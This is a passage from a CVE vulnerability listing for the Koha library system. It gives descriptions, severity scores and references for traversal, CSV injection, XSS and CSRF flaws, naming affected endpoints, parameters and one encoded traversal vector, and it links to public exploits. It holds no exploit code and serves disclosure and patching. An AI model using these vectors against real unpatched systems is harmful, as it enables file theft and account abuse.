"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://koha-community.org/security-release-february-2014/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11661"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11662"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2014-1923",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple directory traversal vulnerabilities in the (1) staff interface help editor (edithelp.pl) or (2) member-picupload.pl in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allow remote attackers to write to arbitrary files via unspecified vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://koha-community.org/security-release-february-2014/",
"refsource": "MISC",
"url": "http://koha-community.org/security-release-february-2014/"
},
{
"name": "http://www.openwall.com/lists/oss-security/2014/02/07/10",
"refsource": "MISC",
"url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
},
{
"name": "http://www.openwall.com/lists/oss-security/2014/02/10/3",
"refsource": "MISC",
"url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
},
{
"name": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11661",
"refsource": "MISC",
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11661"
},
{
"name": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11662",
"refsource": "MISC",
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11662"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2014-1923",
"datePublished": "2020-01-24T16:42:42",
"dateReserved": "2014-02-09T00:00:00",
"dateUpdated": "2024-08-06T09:58:15.695Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-24337 (GCVE-0-2024-24337)
Vulnerability from cvelistv5
Published
2024-02-12 00:00
Modified
2025-09-29 14:22
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
CSV Injection vulnerability in '/members/moremember.pl' and '/admin/aqbudgets.pl' endpoints in Koha Library Management System version 23.05.05 and earlier allows attackers to to inject DDE commands into csv exports via the 'Budget' and 'Patrons Member' components.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-01T23:19:52.558Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://nitipoom-jar.github.io/CVE-2024-24337/"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"cpes": [
"cpe:2.3:a:koha-community:koha_library_software:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "koha_library_software",
"vendor": "koha-community",
"versions": [
{
"lessThanOrEqual": "23.05.05",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-24337",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-26T18:28:30.058045Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1236",
"description": "CWE-1236 Improper Neutralization of Formula Elements in a CSV File",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-08-26T18:33:32.019Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "CSV Injection vulnerability in \u0027/members/moremember.pl\u0027 and \u0027/admin/aqbudgets.pl\u0027 endpoints in Koha Library Management System version 23.05.05 and earlier allows attackers to to inject DDE commands into csv exports via the \u0027Budget\u0027 and \u0027Patrons Member\u0027 components."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-29T14:22:32.206Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://nitipoom-jar.github.io/CVE-2024-24337/"
},
{
"url": "https://nitipoom-jaroonchaipipat.github.io/security-research-portal/2024-24337"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2024-24337",
"datePublished": "2024-02-12T00:00:00.000Z",
"dateReserved": "2024-01-25T00:00:00.000Z",
"dateUpdated": "2025-09-29T14:22:32.206Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2015-4632 (GCVE-0-2015-4632)
Vulnerability from cvelistv5
Published
2018-10-18 20:00
Modified
2024-08-06 06:18
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.
References
| ▼ | URL | Tags |
|---|---|---|
| https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html | x_refsource_MISC | |
| https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/ | x_refsource_MISC | |
| https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408 | x_refsource_CONFIRM | |
| https://koha-community.org/security-release-koha-3-16-12/ | x_refsource_CONFIRM | |
| https://seclists.org/fulldisclosure/2015/Jun/80 | mailing-list, x_refsource_FULLDISC | |
| https://koha-community.org/security-release-koha-3-18-8/ | x_refsource_CONFIRM | |
| https://koha-community.org/security-release-koha-3-20-1/ | x_refsource_CONFIRM | |
| https://www.exploit-db.com/exploits/37388/ | exploit, x_refsource_EXPLOIT-DB | |
| https://koha-community.org/koha-3-14-16-released/ | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T06:18:12.033Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "https://seclists.org/fulldisclosure/2015/Jun/80"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://koha-community.org/security-release-koha-3-18-8/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"name": "37388",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/37388/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://koha-community.org/koha-3-14-16-released/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2015-06-25T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-18T19:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "https://seclists.org/fulldisclosure/2015/Jun/80"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://koha-community.org/security-release-koha-3-18-8/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"name": "37388",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/37388/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://koha-community.org/koha-3-14-16-released/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2015-4632",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html",
"refsource": "MISC",
"url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
},
{
"name": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/",
"refsource": "MISC",
"url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
},
{
"name": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408",
"refsource": "CONFIRM",
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408"
},
{
"name": "https://koha-community.org/security-release-koha-3-16-12/",
"refsource": "CONFIRM",
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
"refsource": "FULLDISC",
"url": "https://seclists.org/fulldisclosure/2015/Jun/80"
},
{
"name": "https://koha-community.org/security-release-koha-3-18-8/",
"refsource": "CONFIRM",
"url": "https://koha-community.org/security-release-koha-3-18-8/"
},
{
"name": "https://koha-community.org/security-release-koha-3-20-1/",
"refsource": "CONFIRM",
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"name": "37388",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/37388/"
},
{
"name": "https://koha-community.org/koha-3-14-16-released/",
"refsource": "CONFIRM",
"url": "https://koha-community.org/koha-3-14-16-released/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2015-4632",
"datePublished": "2018-10-18T20:00:00",
"dateReserved": "2015-06-16T00:00:00",
"dateUpdated": "2024-08-06T06:18:12.033Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-28740 (GCVE-0-2024-28740)
Vulnerability from cvelistv5
Published
2024-08-06 00:00
Modified
2024-08-21 17:34
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Cross Site Scripting vulnerability in Koha ILS 23.05 and before allows a remote attacker to execute arbitrary code via the additonal-contents.pl component.
References
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "koha",
"vendor": "koha",
"versions": [
{
"lessThanOrEqual": "23.05",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-28740",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-21T17:34:03.034235Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-08-21T17:34:11.794Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Cross Site Scripting vulnerability in Koha ILS 23.05 and before allows a remote attacker to execute arbitrary code via the additonal-contents.pl component."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-08-06T18:50:03.372423",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://febin0x4e4a.wordpress.com/2023/01/11/xss-vulnerability-in-koha-integrated-library-system/"
},
{
"url": "https://febin0x4e4a.wordpress.com/2024/03/07/xss-to-one-click-rce-in-koha-ils/"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2024-28740",
"datePublished": "2024-08-06T00:00:00",
"dateReserved": "2024-03-08T00:00:00",
"dateUpdated": "2024-08-21T17:34:11.794Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2011-4715 (GCVE-0-2011-4715)
Vulnerability from cvelistv5
Published
2011-12-08 19:00
Modified
2024-08-07 00:16
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Directory traversal vulnerability in cgi-bin/koha/mainpage.pl in Koha 3.4 before 3.4.7 and 3.6 before 3.6.1, and LibLime Koha 4.2 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the KohaOpacLanguage cookie to cgi-bin/opac/opac-main.pl, related to Output.pm.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/50812 | vdb-entry, x_refsource_BID | |
| http://koha-community.org/koha-3-6-1/#more-2929 | x_refsource_CONFIRM | |
| http://www.vigasis.com/en/?guncel_guvenlik=LibLime%20Koha%20%3C=%204.2%20Local%20File%20Inclusion%20Vulnerability&lnk=exploits/18153 | x_refsource_MISC | |
| http://www.exploit-db.com/exploits/18153 | exploit, x_refsource_EXPLOIT-DB | |
| http://koha-community.org/koha-3-4-7/#more-2971 | x_refsource_CONFIRM | |
| http://osvdb.org/77322 | vdb-entry, x_refsource_OSVDB | |
| http://secunia.com/advisories/46980 | third-party-advisory, x_refsource_SECUNIA | |
| https://github.com/liblime/LibLime-Koha/commit/8ea6f7bc37d05a9ec25b5afbea011cf9de5f1e49#C4/Output.pm | x_refsource_CONFIRM | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/71478 | vdb-entry, x_refsource_XF |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T00:16:34.139Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "50812",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/50812"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://koha-community.org/koha-3-6-1/#more-2929"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.vigasis.com/en/?guncel_guvenlik=LibLime%20Koha%20%3C=%204.2%20Local%20File%20Inclusion%20Vulnerability\u0026lnk=exploits/18153"
},
{
"name": "18153",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "http://www.exploit-db.com/exploits/18153"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://koha-community.org/koha-3-4-7/#more-2971"
},
{
"name": "77322",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/77322"
},
{
"name": "46980",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/46980"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/liblime/LibLime-Koha/commit/8ea6f7bc37d05a9ec25b5afbea011cf9de5f1e49#C4/Output.pm"
},
{
"name": "liblimekoha-opacmain-file-include(71478)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71478"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2011-11-24T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Directory traversal vulnerability in cgi-bin/koha/mainpage.pl in Koha 3.4 before 3.4.7 and 3.6 before 3.6.1, and LibLime Koha 4.2 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the KohaOpacLanguage cookie to cgi-bin/opac/opac-main.pl, related to Output.pm."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "50812",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/50812"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://koha-community.org/koha-3-6-1/#more-2929"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.vigasis.com/en/?guncel_guvenlik=LibLime%20Koha%20%3C=%204.2%20Local%20File%20Inclusion%20Vulnerability\u0026lnk=exploits/18153"
},
{
"name": "18153",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "http://www.exploit-db.com/exploits/18153"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://koha-community.org/koha-3-4-7/#more-2971"
},
{
"name": "77322",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/77322"
},
{
"name": "46980",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/46980"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/liblime/LibLime-Koha/commit/8ea6f7bc37d05a9ec25b5afbea011cf9de5f1e49#C4/Output.pm"
},
{
"name": "liblimekoha-opacmain-file-include(71478)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71478"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2011-4715",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Directory traversal vulnerability in cgi-bin/koha/mainpage.pl in Koha 3.4 before 3.4.7 and 3.6 before 3.6.1, and LibLime Koha 4.2 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the KohaOpacLanguage cookie to cgi-bin/opac/opac-main.pl, related to Output.pm."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "50812",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/50812"
},
{
"name": "http://koha-community.org/koha-3-6-1/#more-2929",
"refsource": "CONFIRM",
"url": "http://koha-community.org/koha-3-6-1/#more-2929"
},
{
"name": "http://www.vigasis.com/en/?guncel_guvenlik=LibLime%20Koha%20%3C=%204.2%20Local%20File%20Inclusion%20Vulnerability\u0026lnk=exploits/18153",
"refsource": "MISC",
"url": "http://www.vigasis.com/en/?guncel_guvenlik=LibLime%20Koha%20%3C=%204.2%20Local%20File%20Inclusion%20Vulnerability\u0026lnk=exploits/18153"
},
{
"name": "18153",
"refsource": "EXPLOIT-DB",
"url": "http://www.exploit-db.com/exploits/18153"
},
{
"name": "http://koha-community.org/koha-3-4-7/#more-2971",
"refsource": "CONFIRM",
"url": "http://koha-community.org/koha-3-4-7/#more-2971"
},
{
"name": "77322",
"refsource": "OSVDB",
"url": "http://osvdb.org/77322"
},
{
"name": "46980",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/46980"
},
{
"name": "https://github.com/liblime/LibLime-Koha/commit/8ea6f7bc37d05a9ec25b5afbea011cf9de5f1e49#C4/Output.pm",
"refsource": "CONFIRM",
"url": "https://github.com/liblime/LibLime-Koha/commit/8ea6f7bc37d05a9ec25b5afbea011cf9de5f1e49#C4/Output.pm"
},
{
"name": "liblimekoha-opacmain-file-include(71478)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71478"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2011-4715",
"datePublished": "2011-12-08T19:00:00",
"dateReserved": "2011-12-08T00:00:00",
"dateUpdated": "2024-08-07T00:16:34.139Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-1000669 (GCVE-0-2018-1000669)
Vulnerability from cvelistv5
Published
2018-09-06 19:00
Modified
2024-09-16 23:46
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
KOHA Library System version 16.11.x (up until 16.11.13) and 17.05.x (up until 17.05.05) contains a Cross Site Request Forgery (CSRF) vulnerability in /cgi-bin/koha/members/paycollect.pl Parameters affected: borrowernumber, amount, amountoutstanding, paid that can result in Attackers can mark payments as paid for certain users on behalf of Administrators. This attack appear to be exploitable via The victim must be socially engineered into clicking a link, usually via email. This vulnerability appears to have been fixed in 17.11.
References
| ▼ | URL | Tags |
|---|---|---|
| https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19117 | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T12:40:47.838Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19117"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"dateAssigned": "2018-09-03T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "KOHA Library System version 16.11.x (up until 16.11.13) and 17.05.x (up until 17.05.05) contains a Cross Site Request Forgery (CSRF) vulnerability in /cgi-bin/koha/members/paycollect.pl Parameters affected: borrowernumber, amount, amountoutstanding, paid that can result in Attackers can mark payments as paid for certain users on behalf of Administrators. This attack appear to be exploitable via The victim must be socially engineered into clicking a link, usually via email. This vulnerability appears to have been fixed in 17.11."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-09-06T19:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19117"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"DATE_ASSIGNED": "2018-09-03T16:07:16.979484",
"DATE_REQUESTED": "2018-08-24T17:46:09",
"ID": "CVE-2018-1000669",
"REQUESTER": "jiakyooi95@hotmail.com",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "KOHA Library System version 16.11.x (up until 16.11.13) and 17.05.x (up until 17.05.05) contains a Cross Site Request Forgery (CSRF) vulnerability in /cgi-bin/koha/members/paycollect.pl Parameters affected: borrowernumber, amount, amountoutstanding, paid that can result in Attackers can mark payments as paid for certain users on behalf of Administrators. This attack appear to be exploitable via The victim must be socially engineered into clicking a link, usually via email. This vulnerability appears to have been fixed in 17.11."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19117",
"refsource": "CONFIRM",
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19117"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-1000669",
"datePublished": "2018-09-06T19:00:00Z",
"dateReserved": "2018-09-06T00:00:00Z",
"dateUpdated": "2024-09-16T23:46:44.626Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2014-1924 (GCVE-0-2014-1924)
Vulnerability from cvelistv5
Published
2020-01-24 16:42
Modified
2024-08-06 09:58
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
